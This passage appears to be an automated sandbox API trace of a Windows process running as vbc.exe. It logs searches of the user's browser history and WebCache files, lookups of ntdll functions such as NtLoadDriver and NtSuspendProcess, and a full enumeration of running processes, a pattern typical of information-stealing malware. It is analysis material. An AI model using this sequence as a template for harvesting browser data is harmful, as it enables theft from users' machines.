(_String="History.IE5") returned 0xb [0066.932] wcscpy (in: _Dest=0x197108, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.932] wcscat (in: _Dest=0x197108, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0066.932] wcscat (in: _Dest=0x197108, _Source="History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0066.932] wcscmp (_String1="History.IE5", _String2="..") returned 1 [0066.932] wcscmp (_String1="History.IE5", _String2=".") returned 1 [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.932] wcslen (_String="*.*") returned 0x3 [0066.932] wcscpy (in: _Dest=0x196234, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.932] wcscat (in: _Dest=0x196234, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0066.932] wcscat (in: _Dest=0x196234, _Source="*.*" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*" [0066.932] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\*.*", lpFindFileData=0x1964bc | out: lpFindFileData=0x1964bc) returned 0x65f248 [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.932] wcslen (_String=".") returned 0x1 [0066.932] wcscpy (in: _Dest=0x19670c, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.932] wcscat (in: _Dest=0x19670c, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0066.932] wcscat (in: _Dest=0x19670c, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\." [0066.932] wcscmp (_String1=".", _String2="..") returned -1 [0066.932] wcscmp (_String1=".", _String2=".") returned 0 [0066.932] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0066.932] FindNextFileW (in: hFindFile=0x65f248, lpFindFileData=0x1964bc | out: lpFindFileData=0x1964bc) returned 1 [0066.933] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.933] wcslen (_String="..") returned 0x2 [0066.933] wcscpy (in: _Dest=0x19670c, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0066.933] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.933] wcscat (in: _Dest=0x19670c, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0066.933] wcscat (in: _Dest=0x19670c, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\.." [0066.933] wcscmp (_String1="..", _String2="..") returned 0 [0066.933] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0066.933] FindNextFileW (in: hFindFile=0x65f248, lpFindFileData=0x1964bc | out: lpFindFileData=0x1964bc) returned 1 [0066.933] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.933] wcslen (_String="container.dat") returned 0xd [0066.933] wcscpy (in: _Dest=0x19670c, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5" [0066.933] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5") returned 0x4d [0066.933] wcscat (in: _Dest=0x19670c, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\" [0066.933] wcscat (in: _Dest=0x19670c, _Source="container.dat" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\container.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\container.dat" [0066.933] _wcsicmp (_String1="container.dat", _String2="index.dat") returned -6 [0066.933] FindNextFileW (in: hFindFile=0x65f248, lpFindFileData=0x1964bc | out: lpFindFileData=0x1964bc) returned 0 [0066.933] FindClose (in: hFindFile=0x65f248 | out: hFindFile=0x65f248) returned 1 [0066.933] FindNextFileW (in: hFindFile=0x65ef88, lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 0 [0066.933] FindClose (in: hFindFile=0x65ef88 | out: hFindFile=0x65ef88) returned 1 [0066.933] FindNextFileW (in: hFindFile=0x65ed48, lpFindFileData=0x1978b4 | out: lpFindFileData=0x1978b4) returned 0 [0066.933] FindClose (in: hFindFile=0x65ed48 | out: hFindFile=0x65ed48) returned 1 [0066.933] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x197bf4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0066.934] wcslen (_String="Microsoft\\Windows\\WebCache\\WebCacheV01.dat") returned 0x2a [0066.934] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0066.934] wcscpy (in: _Dest=0x197e04, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0066.934] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0066.934] wcscat (in: _Dest=0x197e04, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0066.934] wcscat (in: _Dest=0x197e04, _Source="Microsoft\\Windows\\WebCache\\WebCacheV01.dat" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" [0066.934] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")) returned 0x2020 [0066.934] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")) returned 0x2020 [0066.934] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0066.934] GetLastError () returned 0x20 [0066.934] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x197288, nSize=0x104 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) returned 0x35 [0066.934] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0066.934] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77990000 [0066.934] GetProcAddress (hModule=0x77990000, lpProcName="NtQuerySystemInformation") returned 0x779f8f40 [0066.934] GetProcAddress (hModule=0x77990000, lpProcName="NtLoadDriver") returned 0x779f9b30 [0066.934] GetProcAddress (hModule=0x77990000, lpProcName="NtUnloadDriver") returned 0x779fa670 [0066.934] GetProcAddress (hModule=0x77990000, lpProcName="NtOpenSymbolicLinkObject") returned 0x779f9d60 [0066.934] GetProcAddress (hModule=0x77990000, lpProcName="NtQuerySymbolicLinkObject") returned 0x779fa020 [0066.935] GetProcAddress (hModule=0x77990000, lpProcName="NtQueryObject") returned 0x779f8cc0 [0066.935] GetProcAddress (hModule=0x77990000, lpProcName="NtSuspendProcess") returned 0x779fa5d0 [0066.935] GetProcAddress (hModule=0x77990000, lpProcName="NtResumeProcess") returned 0x779fa1f0 [0066.935] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x8a9950, Length=0x1000, ResultLength=0x1974e4 | out: SystemInformation=0x8a9950, ResultLength=0x1974e4*=0x40f54) returned 0xc0000004 [0066.936] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x770870, Length=0x45f54, ResultLength=0x1974e4 | out: SystemInformation=0x770870, ResultLength=0x1974e4*=0x40f54) returned 0x0 [0066.946] CloseHandle (hObject=0x174) returned 1 [0066.946] GetCurrentProcessId () returned 0xc54 [0066.947] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x174 [0066.949] Process32FirstW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.950] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x68, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0066.950] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0066.950] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0066.951] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0066.951] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0066.951] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x0 [0066.951] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0066.952] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0066.952] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0066.952] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x19c) returned 0x0 [0066.952] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0066.953] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0066.953] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0066.954] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0066.954] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0066.954] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0066.955] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.955] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x0 [0066.955] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.956] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x26c) returned 0x0 [0066.956] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0066.956] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d8) returned 0x0 [0066.956] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x55, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.957] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x0 [0066.957] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.957] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x340) returned 0x0 [0066.957] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.958] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0066.958] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.958] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0066.958] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.959] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x0 [0066.959] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.959] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0066.959] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0066.960] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0066.960] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x424, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.960] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x0 [0066.960] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.961] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x44c) returned 0x0 [0066.961] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0066.961] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4d0) returned 0x0 [0066.961] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.962] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5e0) returned 0x0 [0066.962] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x318, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0066.962] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c8) returned 0x184 [0066.962] LoadLibraryW (lpLibFileName="psapi.dll") returned 0x76ec0000 [0066.995] GetProcAddress (hModule=0x76ec0000, lpProcName="GetModuleBaseNameW") returned 0x76ec1420 [0066.995] GetProcAddress (hModule=0x76ec0000, lpProcName="EnumProcessModules") returned 0x76ec13a0 [0066.995] GetProcAddress (hModule=0x76ec0000, lpProcName="GetModuleFileNameExW") returned 0x76ec1400 [0066.995] GetProcAddress (hModule=0x76ec0000, lpProcName="EnumProcesses") returned 0x76ec13c0 [0066.995] GetProcAddress (hModule=0x76ec0000, lpProcName="GetModuleInformation") returned 0x76ec16a0 [0066.995] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0066.995] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\System32\\sihost.exe" | out: _Dest="C:\\Windows\\System32\\sihost.exe") returned="C:\\Windows\\System32\\sihost.exe" [0066.995] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0066.995] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessTimes") returned 0x75153700 [0066.995] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0066.996] CloseHandle (hObject=0x184) returned 1 [0066.996] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x318, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0066.996] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x184 [0066.996] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0066.996] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\System32\\taskhostw.exe" | out: _Dest="C:\\Windows\\System32\\taskhostw.exe") returned="C:\\Windows\\System32\\taskhostw.exe" [0066.996] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0066.996] CloseHandle (hObject=0x184) returned 1 [0066.996] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0066.997] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x698) returned 0x184 [0066.997] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0066.997] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\System32\\RuntimeBroker.exe" | out: _Dest="C:\\Windows\\System32\\RuntimeBroker.exe") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0066.997] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0066.997] CloseHandle (hObject=0x184) returned 1 [0066.997] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x80c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0066.997] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x184 [0066.998] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe")) returned 0x17 [0066.998] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\explorer.exe" | out: _Dest="C:\\Windows\\explorer.exe") returned="C:\\Windows\\explorer.exe" [0066.998] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0066.998] CloseHandle (hObject=0x184) returned 1 [0066.998] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, 